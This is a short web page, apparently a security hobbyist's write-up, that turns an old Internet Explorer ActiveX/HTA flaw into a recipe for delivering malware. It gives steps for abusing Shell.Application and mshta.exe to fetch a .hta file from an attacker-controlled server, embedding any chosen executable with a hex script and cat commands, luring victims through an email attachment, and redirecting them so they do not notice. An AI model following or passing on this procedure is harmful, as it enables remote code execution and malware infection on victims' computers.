This hurts you more than it hurts me.
Based on the "Malicious Shortcut Self-Executing HTML Vulnerability" described at Malware.com
Initialize the Shell.Application ActiveX control
Use it to copy a shortcut file and redirect the target of the copy to a .hta file housed on a confederate server
Launch mshta.exe to download and interpret the cond in the .hta file
The .hta file writes the contents of a .exe file to the hard disk, and then executes it
It sure would be nice if we could change that .hta to include whatever .exe we wanted.
Place the executable of your choice in a directory with top.hta, and bottom.hta
Run hexify.pl; this generates middle.hta - a nicely encoded version of the executable (wasteful, but easy)
cat top.hta > phase2.hta; cat middle.hta >> phase2.hta; cat bottom.hta >> phase2.hta
Send an attachment (attachment.html) that contains a form that submits itself to your web server
The submission forces the client to download a malicious HTML (phase1.html) file with the ActiveX tricks
Unwary browsers will download and execute the script in phase2.hta, which now includes your executable
We nicely redirect the user someplace normal; maybe they didn't even notice (see Huseby)
This page is maintained by Foofus. Please direct comments and questions to foofus <at> foofus.net.